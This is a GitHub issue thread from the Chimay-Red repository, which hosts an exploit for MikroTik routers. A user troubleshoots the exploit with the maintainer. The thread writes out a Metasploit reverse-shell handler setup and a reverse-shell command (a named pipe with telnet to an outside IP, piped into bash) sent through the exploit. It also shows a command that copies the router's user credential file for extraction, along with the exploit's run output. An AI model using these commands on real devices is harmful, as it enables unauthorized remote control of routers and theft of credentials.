shellcommand #28

Open
halekan opened this issue Mar 6, 2018 · 8 comments

@halekan

halekan commented Mar 6, 2018

What shellcommand should I use, and how do I build it on Kali Linux to make it work fine?
/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"
Usage: ./StackClash_mips.py IP PORT binary shellcommand

How to get a reverse shell?

  1. First, prepare metasploit multi handler on your computer

use exploit/multi/handler
set payload linux/mipsbe/meterpreter/reverse_tcp
set LHOST YOUR IP
set LPORT YOUR LPORT
run

Where is the payload to send to the MikroTik, and how do I build it with msfvenom? We have only the binary.

Can you explain?

@BigNerd95
Owner

What is this?
/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Pseudo random command?

Please read the readme.md before opening issues
https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#reverse-shell

@halekan
Author

halekan commented Mar 7, 2018

Good.

I read it in full.
Tested on RB750GL / MIPSBE / v6.37.1

$ nc -l -p 1234

root@test:~/Chimay# ./StackClash_mips.py 192.168.230.113 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.233.190 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

root@test:~/Chimay# ./StackClash_mips.py 192.168.233.190 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"

Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

Extract users: nothing happens

root@test:~/Chimay# curl -s http://192.168.233.190/winbox/index | ./tools/extract_user.py -

root@test:~/Chimay# ... it is blank: no result, no user, no password ...

@BigNerd95
Owner

Does reverse shell work?
When you run "extract user" do you close reverse shell before running the exploit?

@halekan
Author

halekan commented Mar 7, 2018

$ nc -l -p 1234
no

@BigNerd95
Owner

So you have to root your board and debug it.
Sorry, but I can't test all versions for anyone.
If you are able to fix it, then send a PR.

@halekan
Author

halekan commented Mar 7, 2018

How do I root it? Give me the steps one by one.

@BigNerd95
Owner

Also a coffee?

Some links

https://github.com/0ki/mikrotik-tools/tree/master/exploit-backup

https://www.dropbox.com/s/3fey2nmmu993xz1/Rooting%20Mikro%20Tik%20routers.pdf?dl=0

Then read my pdf to install gdb-server

@BigNerd95
Owner

Nope
